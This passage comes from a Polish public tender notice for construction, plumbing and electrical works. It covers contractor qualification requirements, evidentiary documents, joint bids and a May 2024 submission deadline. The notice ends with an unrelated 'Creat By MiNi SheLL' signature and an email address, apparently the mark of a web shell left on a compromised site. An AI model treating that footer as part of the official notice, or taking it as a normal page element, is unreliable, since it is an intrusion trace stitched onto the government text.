500.000,00 zł) odpowiadające <br/>swoim rodzajem robotom budowlanym stanowiącym przedmiot <br/>zamówienia, polegających na wykonywaniu prac ogólnobudowlanych, <br/>hydraulicznych i elektrycznych w budynkach.<br/>b) Warunek dotyczący osób skierowanych przez Wykonawcę do realizacji <br/>zamówienia.<br/>Wykonawca spełni warunek, jeżeli wykaże (Załącznik Nr 4 do SWZ), że <br/>dysponuje i skieruje do realizacji zamówienia co najmniej 3 osoby z <br/>uprawnieniami zawodowymi do wykonywania samodzielnych funkcji w <br/>budownictwie, w tym: <br/>- jedną osobę posiadającą uprawnienia do kierowania robotami <br/>budowlanymi w specjalności konstrukcyjno-budowlanej, która będzie <br/>pełnić funkcję kierownika budowy;<br/>- co najmniej jedną osobę posiadającą uprawnienia do kierowania <br/>robotami budowlanymi w specjalności instalacyjnej w zakresie <br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/>wodociągowych i kanalizacyjnych;<br/>- co najmniej jedną osobę posiadającą uprawnienia do kierowania <br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, <br/>instalacji i urządzeń elektrycznych i elektroenergetycznych ww. <br/>Osoby te muszą spełniać następujące wymagania:<br/>- posiadać uprawnienia do pełnienia samodzielnych funkcji technicznych <br/>w budownictwie do kierowania robotami budowlanymi bez ograniczeń <br/>w branży konstrukcyjno-budowlanej zgodnie z Ustawą z dnia 7 lipca <br/>1994<br/>r. – Prawo Budowlane (tj. Dz.U.2021.2351 ze zm.) oraz zgodnie z <br/>Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r <br/>w sprawie przygotowania zawodowego do wykonywania samodzielnych <br/>funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) oraz być <br/>zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami <br/>Ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów <br/>oraz inżynierów budownictwa (tj. Dz.U. 2022.1557ze zm.) i opłacać składki <br/>z tytułu obowiązującego<br/>ubezpieczenia od odpowiedzialności cywilnej, lub<br/>- spełniać warunki, o których mowa w art. 12a ustawy Prawo budowlane, tj. <br/>być osobą której odpowiednie kwalifikacje zawodowe zostały uznane na <br/>zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o <br/>których mowa w art. 20a Ustawy o samorządach zawodowych architektów <br/>oraz inżynierów budownictwa („świadczenie usług <br/>transgranicznych”).Regulację odrębną stanowią przepisy ustawy z dnia 22 <br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych <br/>w państwach członkowskich Unii Europejskiej (t. j. Dz.U.2022.1616) oraz <br/>być zrzeszoną we właściwym samorządzie zawodowym zgodnie z <br/>14<br/>przepisami Ustawy o samorządach zawodowych architektów oraz <br/>inżynierów budownictwa i opłacać składki z tytułu obowiązującego <br/>ubezpieczenia od odpowiedzialności cywilnej,<br/>W przypadku podmiotów występujących wspólnie warunek ten musi <br/>być spełniony przez co najmniej jednego z Wykonawców. <br/>Przed podpisaniem umowy Wykonawca jest zobowiązany przedstawić <br/>ww. dokumenty lub kserokopie dokumentów poświadczonych za <br/>zgodność z oryginałem. <br/>UWAGA: Ilekroć Zamawiający wymaga określonych uprawnień do <br/>pełnienia samodzielnych funkcji technicznych w budownictwie na <br/>podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994r. Prawo <br/>budowlane (tj. Dz.U.2021.2351 ze zm.) oraz rozporządzeniem Ministra <br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania <br/>zawodowego do wykonywania samodzielnych funkcji technicznych w <br/>budownictwie, rozumie przez to również odpowiadające im ważne <br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących <br/>przepisów prawa lub odpowiednich przepisów obowiązujących na terenie <br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, <br/>uznanych przez właściwy organ zgodnie z ustawą o zasadach uznawania <br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/>Europejskiej.<br/>2. Postanowienia uzupełniające<br/>1) Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada <br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w <br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne <br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację <br/>zamówienia. 2) Sposób spełniania warunków udziału w postępowaniu przez wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia .<br/>a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim <br/>przypadku winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy <br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do <br/>oferty.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, <br/>oświadczenie (Załącznik Nr 2 do SWZ) składa każdy z Wykonawców wspólnie <br/>ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków <br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym <br/>każdy z wykonawców wykazuje spełnianie warunków.<br/>c) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z <br/>postępowania składa każdy z Wykonawców wspólnie ubiegający się o <br/>zamówienie.<br/>d) Przedsiębiorcy prowadzący działalność w formie spółki cywilnej traktowani są jak <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy ci <br/>zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w ppkt 2 <br/>(Załącznik Nr 2 do SWZ).<br/>3. Warunki jakie musi spełnić Wykonawca polegający na zasobach innych podmiotów:<br/>15<br/>a) Wykonawca może w celu potwierdzenia spełniania warunków udziału w <br/>postępowaniu polegać na zdolnościach technicznych lub zawodowych <br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego <br/>łączących go z nimi stosunków prawnych.<br/>b) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach <br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do <br/>realizacji których te zdolności są wymagane. <br/>c) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów <br/>udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu <br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na <br/>potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy <br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował <br/>niezbędnymi zasobami tych podmiotów – wg treści załącznika nr 8 do SWZ, <br/>podpisanego przez podmiot trzeci, udostepniający zasoby.<br/>d) Zamawiający oceni, czy udostępniane wykonawcy przez podmioty <br/>udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na <br/>wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a <br/>także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, <br/>które zostały przewidziane względem Wykonawcy. <br/>e) Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby <br/>nie potwierdzają spełniania przez Wykonawcę warunków udziału w <br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, <br/>Zamawiający żąda, aby Wykonawca w terminie określonym przez <br/>Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo <br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/>UWAGA! Wykonawca nie może, po upływie terminu składania ofert, powoływać się na <br/>zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie <br/>polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających <br/>zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów), <br/>składanych przez Wykonawcę w celu potwierdzenia, że nie podlega on wykluczeniu oraz <br/>spełnia warunki udziału w postępowaniu:<br/>1) Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września <br/>2019 r. Prawo zamówień publicznych o niepodleganiu wykluczeniu i spełnianiu warunków <br/>udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik Nr 2 do SWZ. <br/>UWAGA! WYKONAWCA POWYŻSZE OŚWIADCZENIE DOŁĄCZA DO OFERTY.<br/>2. Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów) <br/>składanych przez Wykonawcę w celu potwierdzenia braku podstaw do wykluczenia:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji.<br/>2)oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 <br/>16<br/>r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym <br/>wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy <br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór <br/>oświadczenia stanowi - Załącznik nr 5 do SWZ;<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast dokumentów wymienionych wyżej, – składa dokument lub dokumenty <br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, <br/>potwierdzające, że:<br/>b) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na <br/>ubezpieczenie społeczne lub zdrowotne, <br/>c)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator <br/>lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona <br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury <br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce <br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których <br/>mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem <br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób <br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, <br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce <br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem <br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub <br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w <br/>postępowaniu, dotyczących sytuacji ekonomicznej lub finansowej Zamawiający <br/>żąda:<br/>a) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od <br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej <br/>tego ubezpieczenia oraz dowodu opłacenia składki, wg stanu na dzień <br/>składania oferty.<br/>2) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w <br/>postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający <br/>żąda następujących podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie <br/>ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o <br/>dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, <br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te <br/>zostały wykonane, z załączeniem dowodów określających czy te roboty <br/>budowlane zostały wykonane należycie, w szczególności informacji o tym <br/>czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i <br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz <br/>którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej <br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie <br/>uzyskać tych dokumentów – inne dokumenty (Załącznik nr 3 do SWZ).<br/>17<br/>b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego – w zakresie o jakim mowa w pkt XV ust. 1 pkt 4b, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacją o podstawie do dysponowania tymi osobami zgodnego ze <br/>wzorem stanowiącym Załącznik nr 4 do SWZ<br/>4. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio <br/>podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym <br/>czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych <br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, <br/>jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w <br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile <br/>wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, <br/>dane umożliwiające dostęp do tych środków.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków <br/>dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz <br/>potwierdzi ich prawidłowość i aktualność.<br/>7. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1 ustawy, <br/>podmiotowych środków dowodowych, innych dokumentów lub oświadczeń <br/>składanych w postępowaniu lub są one niekompletne lub zawierają błędy, <br/>Zamawiający wzywa Wykonawcę odpowiednio do ich złożenia, poprawienia lub <br/>uzupełnienia w wyznaczonym terminie, chyba że:<br/>a) oferta wykonawcy podlegają odrzuceniu bez względu na ich złożenie, <br/>uzupełnienie lub poprawienie lub<br/>b) zachodzą przesłanki unieważnienia postępowania.<br/>8. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści <br/>oświadczenia, o którym mowa w art.125 ust.1 ustawy, lub złożonych podmiotowych <br/>środków dowodowych lub innych dokumentów lub oświadczeń składanych w <br/>postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych przez <br/>Wykonawcę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga, aby w przypadku powierzenia <br/>części zamówienia Podwykonawcom, Wykonawca wskazał w ofercie części zamówienia, <br/>których wykonanie zamierza powierzyć Podwykonawcom oraz podał (o ile są mu wiadome na <br/>tym etapie) nazwy/firmy Podwykonawców- Załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim <br/>przypadku winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy <br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do <br/>oferty.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, <br/>oświadczenie (Załącznik Nr 2 do SWZ) składa każdy z Wykonawców wspólnie <br/>ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków <br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym <br/>każdy z wykonawców wykazuje spełnianie warunków.<br/>c) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z <br/>postępowania składa każdy z Wykonawców wspólnie ubiegający się o <br/>zamówienie.<br/>d) Przedsiębiorcy prowadzący działalność w formie spółki cywilnej traktowani są jak <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy ci <br/>zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w ppkt 2 <br/>(Załącznik Nr 2 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami zał. nr 7 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamówienia pod adresem: https://ezamowienia.gov.pl. Wykonawca przygotowuje ofertę przy pomocy interaktywnego &#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie eZamówienia i zamieszczonego w podglądzie postępowania w zakładce &#34;Informacje podstawowe&#34;. Sposób złożenia oferty opisany na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com